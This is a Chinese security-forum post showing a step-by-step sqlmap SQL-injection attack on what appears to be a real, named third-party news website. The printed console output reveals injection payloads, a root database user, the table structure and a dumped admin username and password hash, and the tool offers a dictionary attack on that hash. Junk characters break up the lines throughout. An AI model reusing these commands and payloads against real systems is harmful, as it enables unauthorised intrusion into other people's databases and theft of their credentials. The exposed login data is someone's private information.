找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2454|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( Y! y! X7 U! C4 e4 m. O
ms "Mysql" --current-user       /*  注解:获取当前用户名称
) {; S, L3 e0 c6 {, O    sqlmap/0.9 - automatic SQL injection and database takeover tool, {! n% b' m0 L. A+ g
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    1 Z1 g0 [$ U2 T: r2 c+ L[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ) G3 W" E9 ^! J0 ^ session file( \% |* M1 b. q9 T- |- p
    [16:53:54] [INFO] resuming injection data from session file4 Y) H, ^; }9 }) }2 @
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    " V- {( s% v6 j8 e* [) `# x[16:53:54] [INFO] testing connection to the target url  V- G7 x" r) B2 M8 p  W3 x
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 n2 G0 V' S3 o9 \! w% _0 j
    sts:
    + y$ l4 Z6 w: ?5 I) H3 S---
    # `& ]; c% T0 `1 g5 m7 XPlace: GET
    ; m& l: b4 T* m+ iParameter: id; f  _2 z( V1 y! Q) w. ^' c
        Type: boolean-based blind* y" ^" e+ o& Q3 A
        Title: AND boolean-based blind - WHERE or HAVING clause
    3 h+ S  I- X1 R    Payload: id=276 AND 799=799
    * w; W8 g7 X" b, C1 |    Type: error-based/ F% Y& T0 X, [  a
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    0 {# I/ D/ ]" J* E) M" l: a. e    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ c* W: {- }( r" M, V$ R
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58/ r3 U5 ^6 @0 N$ S
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    . O) w4 W: F/ {. r9 m/ B, L    Type: UNION query
    + l" b1 s/ T! t/ U# h! f* i4 w    Title: MySQL UNION query (NULL) - 1 to 10 columns
    * ^3 ]. ]. J7 J+ M    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % G' S8 F5 \+ n+ o- O7 N9 u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # E3 {- Z' K5 j6 |8 _, E- dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#; O( z% b$ q  s& |
        Type: AND/OR time-based blind
    / N3 C- \! W. L9 k7 t( ?    Title: MySQL > 5.0.11 AND time-based blind% ~5 |2 l  ?4 j, V
        Payload: id=276 AND SLEEP(5)
      N- d1 m; O; Z9 F& ^$ n" j---
    7 Z+ I6 {. l, D2 q% Z% N& R[16:53:55] [INFO] the back-end DBMS is MySQL
    % r. p5 ]& O9 C" z, p3 wweb server operating system: Windows( O  q8 D: \- S- i/ v; p1 c+ K
    web application technology: Apache 2.2.11, PHP 5.3.04 V- E$ s( Q$ ^# w3 u$ o7 B- V
    back-end DBMS: MySQL 5.0( A8 E* m+ @7 H
    [16:53:55] [INFO] fetching current user/ @  }$ c7 s& l1 @9 z0 H! [
    current user:    'root@localhost'   % j) u* Z( P2 P: V, @
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    6 q/ {: C' v3 Gtput\www.wepost.com.hk'
  • shutting down at: 16:53:58/ x6 \6 B$ ^6 h
    5 e' v  o0 f6 i; I5 a
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ! o& j/ C0 x* {6 Fms "Mysql" --current-db                  /*当前数据库
    / A$ {1 d. ^  m' L9 R    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ! m0 d5 M2 q) w0 p! f    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    6 Y! K/ c2 ?" X5 u, ?[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    7 V8 C  _6 ~7 d4 j session file
    ) v" V9 o) x8 P2 g[16:54:16] [INFO] resuming injection data from session file+ J5 H) T  I, v' e, U+ P- P
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. r6 B6 _" u2 y& t3 u
    [16:54:16] [INFO] testing connection to the target url1 d) o: F; v. h# E# Y
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ |# W/ k6 j  ]7 |' X& Y* x
    sts:- r! [/ ]+ n8 q6 t7 v0 U: i9 _% S
    ---$ {$ Q8 I3 v. J$ Y! ~
    Place: GET' l- P) h! T2 ~, R& m. r* Q2 Q
    Parameter: id" N& X8 P( @7 g. n: h
        Type: boolean-based blind
    % W3 x1 y1 U- Z    Title: AND boolean-based blind - WHERE or HAVING clause
    2 |) F3 Q3 N& f' Z/ @2 P    Payload: id=276 AND 799=799- |1 K0 u) |7 w% H$ n& g2 z5 G
        Type: error-based
    % W: D% b6 C4 [3 X    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! g3 T& F% _9 L7 f. e    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ }* X* c! j4 i% `
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 _0 h6 S2 Z5 b# p; k/ M! b: g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! r+ J0 m9 N) y' L' e
        Type: UNION query. k5 ~  A# @( g9 g4 b% N
        Title: MySQL UNION query (NULL) - 1 to 10 columns" z# \. C* i/ D
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR# b6 b0 s8 w' @2 j
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : O& Z" x) o7 s8 MCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#  O0 C( s& h2 c' G4 I$ X: r
        Type: AND/OR time-based blind9 I5 n" s+ x9 a+ t& y- Y5 m5 ?
        Title: MySQL > 5.0.11 AND time-based blind  J8 l) K  _" e3 f  ?0 c3 r
        Payload: id=276 AND SLEEP(5)
    , T8 \! Y. d) p- W2 \) h---
    * p/ V1 x- b6 B- Y[16:54:17] [INFO] the back-end DBMS is MySQL
      y9 i8 |# z! y" O0 Dweb server operating system: Windows8 o- L" C- U  q+ K0 M: J
    web application technology: Apache 2.2.11, PHP 5.3.0
    5 q) B* l3 ]6 Y) t. R; B' Q3 z! y  h* N& Eback-end DBMS: MySQL 5.0
      ?  z! ~3 `- i) k( d" \, P[16:54:17] [INFO] fetching current database  k, n- ]3 g1 r0 c- H
    current database:    'wepost'
    3 ?4 m9 t) f4 @$ L) ^8 v, J( r) m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    $ g0 m" J) l( n$ G+ Wtput\www.wepost.com.hk'
  • shutting down at: 16:54:18- \$ a5 I2 X. M: L
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) g, w# {- R+ Y% y/ E5 F
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    ( K* Z6 O7 n$ k9 \    sqlmap/0.9 - automatic SQL injection and database takeover tool" Q- m/ j  ]3 H0 ^; m+ w
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    , V( m" J0 w; m# `* x" E0 [[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    / f* M9 g# N( E/ X& ?+ P session file
    3 K% {* K2 Y0 M6 V4 N) v4 ^[16:55:25] [INFO] resuming injection data from session file, L  R) ~" Q6 _# l1 }3 k
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file, G! K8 O  c( T
    [16:55:25] [INFO] testing connection to the target url
    ' S1 V  e3 G% Hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / r" O5 I, e9 T4 Dsts:
    ( H+ ~/ m+ g6 I( n---
    6 R- @) J# S* uPlace: GET
    $ k0 J8 w5 L/ W9 w- C4 ~Parameter: id$ L; e" G6 @; D7 s
        Type: boolean-based blind# u2 h6 t' e( h4 N/ Y6 R% k
        Title: AND boolean-based blind - WHERE or HAVING clause! \! Z9 }- }; M
        Payload: id=276 AND 799=7996 [- A$ @# r  y$ O
        Type: error-based4 W' Y$ q! Y* n7 m- ~1 [
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      X& K6 t3 z6 N2 X    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,- u! M( }$ Z+ V) m
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58& |! J2 i' m- x8 u4 X
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 A, F0 ~% S$ o/ B* f
        Type: UNION query9 V9 J1 a( j2 m' \# L
        Title: MySQL UNION query (NULL) - 1 to 10 columns/ Y3 f( a0 d9 H2 h* `
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 ~3 n( s: C' T" P: A2 E+ f3 O
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    % L: [) q9 i( U5 {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 g# ^" ^: [8 @( V% V8 @$ l- p
        Type: AND/OR time-based blind4 l5 \4 z7 ]9 j) r8 y9 I0 K3 F
        Title: MySQL > 5.0.11 AND time-based blind
      }: }- U3 s# K: m, D    Payload: id=276 AND SLEEP(5)3 ]! d' J  h$ h- o2 D
    ---
    1 ]! j' q& Y/ e0 H[16:55:26] [INFO] the back-end DBMS is MySQL
    & F2 i& ]! O' ~8 `4 \  j; E7 O5 wweb server operating system: Windows* L: ]* T: W7 P
    web application technology: Apache 2.2.11, PHP 5.3.06 G/ ?" E2 B( R  K
    back-end DBMS: MySQL 5.06 O, p( _& L7 c+ |9 q$ A# I) m
    [16:55:26] [INFO] fetching tables for database 'wepost', a9 C' a! l7 x( Q
    [16:55:27] [INFO] the SQL query used returns 6 entries/ h) Z- I- h: J; g2 O% a$ v& h
    Database: wepost
    ; w" H1 D& y; S[6 tables]2 m6 ~: Z- u( M% H, G( K
    +-------------+
    : X( t) y- Q/ ~; e5 h& g" u9 ]/ f/ e| admin       |2 i6 q9 }" A# {4 Z0 W) G
    | article     |
    . ^; Y* f6 w% Z: W3 H| contributor |  d- K. U7 {* S2 E2 v
    | idea        |
    5 s* w6 U/ z( r  E( J2 b| image       |
    , C7 b, y( i4 I! J: M' n; C| issue       |
    " O9 U' @" ]. a: C' K+ p+-------------+4 s5 f, s/ \& x' y
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    - L3 J1 K. c4 w5 [tput\www.wepost.com.hk'
  • shutting down at: 16:55:33" X4 i1 F: R1 r8 P- r5 L

    , U1 v+ y5 i& E$ ?# ID:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; S$ q: m6 A7 e' O) a0 H
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名& s4 W  `2 k/ [3 V* V4 z# l1 \
        sqlmap/0.9 - automatic SQL injection and database takeover tool( u3 b0 h0 _1 t: _# }- y* [
        http://sqlmap.sourceforge.net
  • starting at: 16:56:062 v. l, O" e) o- i
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque& v; _) i' t5 U
    sts:7 k7 A  {5 J  }' @- p. r) U
    ---: g. ]; Z% M- k. R5 o" \" u' J: O
    Place: GET
    . A- M5 w2 q) M7 O1 i: y4 r$ hParameter: id1 l" E; u* {/ S+ G$ N- U
        Type: boolean-based blind% P& f5 v% D9 C' o
        Title: AND boolean-based blind - WHERE or HAVING clause
    & P  S! {1 u% b; K& ]    Payload: id=276 AND 799=799
    / {4 V3 ?( U- M- R7 V) Z    Type: error-based0 I! @/ T9 @2 U2 \$ Q
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    1 B# H' R2 |8 g0 b- ~" S    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    # D8 }4 @1 I3 ]7 D$ V* ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ; f7 E0 n# w/ u. A) M+ S* J, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    4 U" g* r( R6 d    Type: UNION query
    ' l: ~$ H: ^1 ]& }) S  j    Title: MySQL UNION query (NULL) - 1 to 10 columns
    2 P  Q  ^6 h3 b, i6 P    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 k) ^3 _$ S0 I- C, c2 d
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : m2 T( b, Q6 ^8 ?0 FCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    0 o  u4 ]3 `) X( Q1 C5 v5 m    Type: AND/OR time-based blind7 w4 T1 {. V$ q, D# `
        Title: MySQL > 5.0.11 AND time-based blind1 O6 H  r: v6 o4 ]: `" Z) ?
        Payload: id=276 AND SLEEP(5)
    # C! ]" U4 n1 D---; f1 e/ |* M0 @4 h* U5 x
    web server operating system: Windows
    7 b, J# e) i8 [& U: z4 `web application technology: Apache 2.2.11, PHP 5.3.01 |7 U' B5 d% i9 I1 O
    back-end DBMS: MySQL 5.0
    # `; J: K6 T$ |; D9 l4 V[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    ( I' G5 B9 |- B$ o+ o7 ession': wepost, wepost
      F4 J# ^" c7 J! L4 EDatabase: wepost
    8 n. I: W& t8 ETable: admin; l/ s: n  @' h" v/ V6 ~
    [4 columns]4 c+ `1 t! U4 m# H& V: r0 v) a
    +----------+-------------+" w6 ]# W  e. h+ E" u" Y  d
    | Column   | Type        |9 b0 V1 \$ G  {& \3 ?/ v
    +----------+-------------+
    5 h/ A& v/ E' C7 i: c| id       | int(11)     |' T3 ]/ I2 p& X* [
    | password | varchar(32) |' ?$ \  A; H( ]
    | type     | varchar(10) |) d- Q# R, g% W8 G* _1 l
    | userid   | varchar(20) |2 u! V! p" U" }. t8 [$ Q
    +----------+-------------+; V- G  x: W2 ~  U! ^
  • shutting down at: 16:56:19  b4 @' {' d* N* x% ^, W
    * r- B2 N8 p9 R. M5 Q/ r' S
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    & \9 L* s" P& jms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    & d6 f" J; w6 e2 a1 X+ L    sqlmap/0.9 - automatic SQL injection and database takeover tool7 V) ]1 t7 u& g( T0 k2 O  D- U% L
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14  M; m$ h7 F6 N2 L7 Q
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 e+ F  D# |4 `4 Z' W3 c3 n
    sts:
    0 Z9 l. y$ [8 x/ b. ~  @' i---
    7 s7 ?$ m7 J! b( N% EPlace: GET
    4 I; [! W- M& @' h8 fParameter: id% B4 }7 J/ V; A, E) W  Z
        Type: boolean-based blind
    " X' N' u1 A% T- k" Y' x( e    Title: AND boolean-based blind - WHERE or HAVING clause! d" G3 x5 ?0 _( D  d. Z3 K1 s  C
        Payload: id=276 AND 799=7997 L/ V  h% z: g! x
        Type: error-based
      S: a+ k" W* O    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; s+ \, a' s( u6 r
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    % a( K2 g1 s( F: ~120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 ~9 _1 M7 C7 B6 \( [6 `
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ r5 F+ y2 n, l" v/ Y; ?3 H, J: V
        Type: UNION query1 Q. ?& i" ~: g' R# R# U% q0 u
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    ( \4 B3 c4 ^5 _6 T1 C) [! m- S    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    $ l+ ?' ]( E+ }% H& S* ?  L; d' s& V(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ `% z4 p7 U9 U! d( B6 ?
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( ]( g; x! h( \, ]; S
        Type: AND/OR time-based blind
    ) ]+ z- X7 B: z# p    Title: MySQL > 5.0.11 AND time-based blind( y# e5 j0 t% r6 A1 S! l% g( W8 U
        Payload: id=276 AND SLEEP(5)
    2 J- M, d, a0 G- d. ^+ R# F+ e. Z% l---
    : O# @! A7 D- }web server operating system: Windows
    $ R, @0 F1 [8 v! n5 Eweb application technology: Apache 2.2.11, PHP 5.3.0
    $ k$ }* {5 H" Y! k: G1 ]0 Lback-end DBMS: MySQL 5.0) D! P) x, j% a9 h* t+ T, Q
    recognized possible password hash values. do you want to use dictionary attack o8 D& ]( C5 O: n$ @9 g& G3 V* g. T
    n retrieved table items? [Y/n/q] y# V) k& N1 ?! {/ [
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]7 Q0 H$ |0 o3 [7 {) K
    do you want to use common password suffixes? (slow!) [y/N] y
    & B1 M4 l3 z. p( i% wDatabase: wepost/ p  \& o, Q! h: w1 H  ]- W& T/ {- z
    Table: admin3 V( V' z, Y: Y6 {0 P4 o
    [1 entry]
    3 F0 u; N6 N; e% U( W2 K8 o" q+----------------------------------+------------+! E2 w/ P) w2 ]3 L* w) t5 w( j
    | password                         | userid     |, i; x- }% q0 b+ o
    +----------------------------------+------------+" l4 s: t: k/ U( x' w( Y2 o
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |  H( S6 h% m. G. E
    +----------------------------------+------------+
    ( y% \7 I- h. K) x9 ^8 U0 ]
  • shutting down at: 16:58:148 r) j" l8 t- Y1 H6 F3 K8 `: A

    1 Y( R$ F+ }0 {* P  R: r2 v) gD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表